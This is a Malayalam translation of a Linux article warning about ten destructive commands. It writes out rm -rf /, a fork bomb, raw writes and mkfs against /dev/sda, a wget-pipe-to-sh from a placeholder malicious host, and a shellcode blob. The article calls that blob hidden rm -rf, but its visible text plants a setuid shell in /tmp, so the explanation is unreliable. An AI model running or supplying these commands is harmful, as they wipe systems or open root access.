10 ഏറ്റവും അപകടകരമായ കമാൻഡുകൾ - നിങ്ങൾ ഒരിക്കലും Linux-ൽ എക്സിക്യൂട്ട് ചെയ്യരുത്


Linux കമാൻഡ് ലൈൻ ഉൽപ്പാദനക്ഷമവും ഉപയോഗപ്രദവും രസകരവുമാണ്, എന്നാൽ നിങ്ങൾ എന്താണ് ചെയ്യുന്നതെന്ന് നിങ്ങൾക്ക് ഉറപ്പില്ലെങ്കിൽ ചിലപ്പോൾ ഇത് വളരെ അപകടകരമാണ്. ഈ ലേഖനം നിങ്ങളെ Linux അല്ലെങ്കിൽ Linux കമാൻഡ് ലൈനിൽ പ്രകോപിപ്പിക്കാൻ ഉദ്ദേശിച്ചുള്ളതല്ല. നിർവ്വഹിക്കുന്നതിന് മുമ്പ് നിങ്ങൾ രണ്ടുതവണ ചിന്തിക്കേണ്ട ചില കമാൻഡുകളെക്കുറിച്ച് നിങ്ങളെ അറിയിക്കാൻ ഞങ്ങൾ ആഗ്രഹിക്കുന്നു.

1. rm -rf കമാൻഡ്

ഒരു ഫോൾഡറും അതിലെ ഉള്ളടക്കങ്ങളും ഇല്ലാതാക്കുന്നതിനുള്ള ഏറ്റവും വേഗതയേറിയ മാർഗമാണ് rm -rf കമാൻഡ്. എന്നാൽ ചെറിയ അക്ഷരത്തെറ്റ് അല്ലെങ്കിൽ അജ്ഞത വീണ്ടെടുക്കാനാകാത്ത സിസ്റ്റം നാശത്തിലേക്ക് നയിച്ചേക്കാം. rm കമാൻഡിൽ ഉപയോഗിക്കുന്ന ചില ഓപ്ഷനുകൾ ഇവയാണ്.

    ഫയലുകൾ ഇല്ലാതാക്കാൻ ലിനക്സിലെ
  1. rm കമാൻഡ് ഉപയോഗിക്കുന്നു.
  2. rm -r കമാൻഡ് ശൂന്യമായ ഫോൾഡർ പോലും ആവർത്തിച്ച് ഫോൾഡറിനെ ഇല്ലാതാക്കുന്നു.
  3. rm -f കമാൻഡ് ചോദിക്കാതെ തന്നെ ‘റീഡ് ഒൺലി ഫയൽ’ നീക്കം ചെയ്യുന്നു.
  4. rm -rf/: റൂട്ട് ഡയറക്uടറിയിലെ എല്ലാം ഇല്ലാതാക്കാൻ നിർബന്ധിക്കുക.
  5. rm -rf * : നിലവിലെ ഡയറക്uടറി/വർക്കിംഗ് ഡയറക്uടറിയിലെ എല്ലാം ഇല്ലാതാക്കാൻ നിർബന്ധിക്കുക.
  6. rm -rf . : നിലവിലുള്ള ഫോൾഡറും ഉപ ഫോൾഡറുകളും നിർബന്ധിതമായി ഇല്ലാതാക്കുക.

അതിനാൽ, നിങ്ങൾ rm -rf കമാൻഡ് എക്സിക്യൂട്ട് ചെയ്യുമ്പോൾ ശ്രദ്ധിക്കുക. 'rm' കമാൻഡ് വഴി ഫയൽ ആകസ്മികമായി ഇല്ലാതാക്കുന്നത് മറികടക്കാൻ, .bashrc ഫയലിൽ 'rm' കമാൻഡിന്റെ ഒരു അപരനാമം 'rm -i' ആയി സൃഷ്uടിക്കുക, എല്ലാ ഇല്ലാതാക്കലും സ്ഥിരീകരിക്കാൻ അത് നിങ്ങളോട് ആവശ്യപ്പെടും.

2. :(){:|:&};: കമാൻഡ്

മുകളിൽ പറഞ്ഞത് യഥാർത്ഥത്തിൽ ഒരു ഫോർക്ക് ബോംബാണ്. ':' എന്ന് വിളിക്കുന്ന ഒരു ഫംഗ്uഷൻ നിർവചിച്ചുകൊണ്ടാണ് ഇത് പ്രവർത്തിക്കുന്നത്, അത് സ്വയം രണ്ട് തവണ, ഒരു തവണ മുൻവശത്തും ഒരിക്കൽ പശ്ചാത്തലത്തിലും വിളിക്കുന്നു. സിസ്റ്റം ഫ്രീസ് ആകുന്നത് വരെ ഇത് വീണ്ടും വീണ്ടും എക്സിക്യൂട്ട് ചെയ്തുകൊണ്ടിരിക്കും.

:(){:|:&};:

3. കമാൻഡ് > /dev/sda

മുകളിലെ കമാൻഡ് /dev/sda എന്ന ബ്ലോക്കിൽ 'കമാൻഡ്' ന്റെ ഔട്ട്പുട്ട് എഴുതുന്നു. മുകളിലെ കമാൻഡ് റോ ഡാറ്റ എഴുതുന്നു, ബ്ലോക്കിലെ എല്ലാ ഫയലുകളും റോ ഡാറ്റ ഉപയോഗിച്ച് മാറ്റിസ്ഥാപിക്കും, അങ്ങനെ ബ്ലോക്കിലെ ഡാറ്റ മൊത്തത്തിൽ നഷ്ടപ്പെടും.

4. mv ഫോൾഡർ /dev/null

മുകളിലുള്ള കമാൻഡ് 'ഫോൾഡർ' /dev/null-ലേക്ക് നീക്കും. Linux-ൽ /dev/null അല്ലെങ്കിൽ null ഉപകരണം ഒരു പ്രത്യേക ഫയലാണ്, അതിൽ എഴുതിയിരിക്കുന്ന എല്ലാ ഡാറ്റയും നിരസിക്കുകയും റൈറ്റ് ഓപ്പറേഷൻ വിജയിക്കുന്ന റിപ്പോർട്ടുകൾ.

# mv /home/user/* /dev/null

മുകളിലുള്ള കമാൻഡ് ഒരു ഉപയോക്തൃ ഡയറക്uടറിയിലെ എല്ലാ ഉള്ളടക്കങ്ങളും /dev/null എന്നതിലേക്ക് നീക്കും, അതിനർത്ഥം അവിടെയുള്ളതെല്ലാം ബ്ലാക്ക്uഹോളിലേക്ക് (null) അയച്ചിരിക്കുന്നു എന്നാണ്.

5. wget http://malicious_source -O- | sh

മുകളിലെ കമാൻഡ് ഒരു ക്ഷുദ്ര ഉറവിടത്തിൽ നിന്ന് ഒരു സ്ക്രിപ്റ്റ് ഡൗൺലോഡ് ചെയ്യുകയും തുടർന്ന് അത് നടപ്പിലാക്കുകയും ചെയ്യും. Wget കമാൻഡ് സ്ക്രിപ്റ്റ് ഡൗൺലോഡ് ചെയ്യുകയും sh ഡൗൺലോഡ് ചെയ്ത സ്ക്രിപ്റ്റ് എക്സിക്യൂട്ട് ചെയ്യുകയും ചെയ്യും.

ശ്രദ്ധിക്കുക: നിങ്ങൾ പാക്കേജുകളും സ്uക്രിപ്റ്റുകളും എവിടെ നിന്നാണ് ഡൗൺലോഡ് ചെയ്യുന്നതെന്ന് ഉറവിടത്തെക്കുറിച്ച് നിങ്ങൾക്ക് വളരെയധികം ബോധമുണ്ടായിരിക്കണം. വിശ്വസനീയമായ ഉറവിടത്തിൽ നിന്ന് ഡൗൺലോഡ് ചെയ്uത സ്uക്രിപ്റ്റുകൾ/ആപ്ലിക്കേഷനുകൾ മാത്രം ഉപയോഗിക്കുക.

6. mkfs.ext3 /dev/sda

മുകളിലുള്ള കമാൻഡ് 'sda' എന്ന ബ്ലോക്ക് ഫോർമാറ്റ് ചെയ്യും, മുകളിലുള്ള കമാൻഡ് നടപ്പിലാക്കിയ ശേഷം നിങ്ങളുടെ ബ്ലോക്ക് (ഹാർഡ് ഡിസ്ക് ഡ്രൈവ്) പുതിയതും പുതുമയുള്ളതുമാകുമെന്ന് നിങ്ങൾ തീർച്ചയായും അറിഞ്ഞിരിക്കും! ഒരു ഡാറ്റയും ഇല്ലാതെ, നിങ്ങളുടെ സിസ്റ്റത്തെ വീണ്ടെടുക്കാനാകാത്ത ഘട്ടത്തിലേക്ക് വിടുന്നു.

7. > ഫയൽ

ഫയലിന്റെ ഉള്ളടക്കം ഫ്ലഷ് ചെയ്യുന്നതിന് മുകളിലുള്ള കമാൻഡ് ഉപയോഗിക്കുന്നു. > xt.conf പോലെയുള്ള അക്ഷരത്തെറ്റ് അല്ലെങ്കിൽ അജ്ഞത ഉപയോഗിച്ചാണ് മുകളിലെ കമാൻഡ് നടപ്പിലാക്കുന്നതെങ്കിൽ, കോൺഫിഗറേഷൻ ഫയലോ മറ്റേതെങ്കിലും സിസ്റ്റം അല്ലെങ്കിൽ കോൺഫിഗറേഷൻ ഫയലോ എഴുതും.

8. ^foo^ബാർ

ഞങ്ങളുടെ 10 Lesser Known Linux കമാൻഡുകളിൽ വിവരിച്ചിരിക്കുന്നതുപോലെ ഈ കമാൻഡ്, മുഴുവൻ കമാൻഡും വീണ്ടും ടൈപ്പ് ചെയ്യാതെ തന്നെ മുമ്പത്തെ റൺ കമാൻഡ് എഡിറ്റുചെയ്യാൻ ഉപയോഗിക്കുന്നു. എന്നാൽ ^foo^bar കമാൻഡ് ഉപയോഗിച്ച് യഥാർത്ഥ കമാൻഡിലെ മാറ്റം നിങ്ങൾ നന്നായി പരിശോധിക്കുന്നില്ലെങ്കിൽ ഇത് ശരിക്കും പ്രശ്uനമുണ്ടാക്കും.

9. dd if=/dev/random of=/dev/sda

മുകളിലെ കമാൻഡ് ബ്ലോക്ക് sda മായ്uക്കുകയും ബ്ലോക്കിലേക്ക് ക്രമരഹിതമായ ജങ്ക് ഡാറ്റ എഴുതുകയും ചെയ്യും. തീർച്ചയായും! നിങ്ങളുടെ സിസ്റ്റം അസ്ഥിരവും വീണ്ടെടുക്കാനാകാത്തതുമായ ഘട്ടത്തിൽ അവശേഷിക്കും.

10. കമാൻഡ് മറച്ചു

താഴെയുള്ള കമാൻഡ് മുകളിലുള്ള ആദ്യ കമാൻഡ് അല്ലാതെ മറ്റൊന്നുമല്ല (rm -rf). ഇവിടെ കോഡുകൾ ഹെക്സിൽ മറച്ചിരിക്കുന്നു, അതിനാൽ ഒരു അജ്ഞനായ ഉപയോക്താവിനെ കബളിപ്പിക്കാം. നിങ്ങളുടെ ടെർമിനലിൽ താഴെയുള്ള കോഡ് പ്രവർത്തിപ്പിക്കുന്നത് നിങ്ങളുടെ റൂട്ട് പാർട്ടീഷൻ മായ്uക്കും.

ഇവിടെ ഈ കമാൻഡ് കാണിക്കുന്നത് ഭീഷണി മറഞ്ഞിരിക്കാമെന്നും ചിലപ്പോൾ സാധാരണ കണ്ടുപിടിക്കാൻ കഴിയില്ലെന്നും. നിങ്ങൾ എന്താണ് ചെയ്യുന്നതെന്നും അതിന്റെ ഫലം എന്തായിരിക്കുമെന്നും നിങ്ങൾ അറിഞ്ഞിരിക്കണം. ഒരു അജ്ഞാത ഉറവിടത്തിൽ നിന്ന് കോഡുകൾ കംപൈൽ ചെയ്യരുത്/റൺ ചെയ്യരുത്.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

ശ്രദ്ധിക്കുക: നിങ്ങളുടെ Linux ടെർമിനലിലോ ഷെല്ലിലോ നിങ്ങളുടെ സുഹൃത്തിന്റെയോ സ്കൂൾ കമ്പ്യൂട്ടറിലോ മുകളിലെ കമാൻഡ് ഒന്നും എക്സിക്യൂട്ട് ചെയ്യരുത്. നിങ്ങൾക്ക് അവ പരീക്ഷിക്കാൻ താൽപ്പര്യമുണ്ടെങ്കിൽ, അവയെ വെർച്വൽ മെഷീനിൽ പ്രവർത്തിപ്പിക്കുക. മുകളിലെ കമാൻഡിന്റെ നിർവ്വഹണം കാരണം ഏതെങ്കിലും സ്ഥിരതയോ ഡാറ്റാ നഷ്uടമോ നിങ്ങളുടെ സിസ്റ്റത്തെ തകർക്കും, അതിന് ലേഖനത്തിന്റെ രചയിതാവോ ടെക്uമിന്റോ ഉത്തരവാദിയല്ല.

ഇപ്പോഴത്തേക്ക് ഇത്രമാത്രം. നിങ്ങൾ വായിക്കാൻ ഇഷ്ടപ്പെടുന്ന രസകരമായ മറ്റൊരു ലേഖനവുമായി ഞാൻ ഉടൻ ഇവിടെ എത്തും. അതുവരെ തുടരുക, Tecmint-ലേക്ക് കണക്റ്റ് ചെയ്യുക. അത്തരം അപകടകരമായ മറ്റേതെങ്കിലും ലിനക്സ് കമാൻഡുകൾ നിങ്ങൾക്ക് അറിയാമെങ്കിൽ, ഞങ്ങൾ പട്ടികയിലേക്ക് ചേർക്കാൻ ആഗ്രഹിക്കുന്നുവെങ്കിൽ, ദയവായി അഭിപ്രായ വിഭാഗത്തിലൂടെ ഞങ്ങളോട് പറയുക, നിങ്ങളുടെ മൂല്യവത്തായ ഫീഡ്uബാക്ക് നൽകാൻ മറക്കരുത്.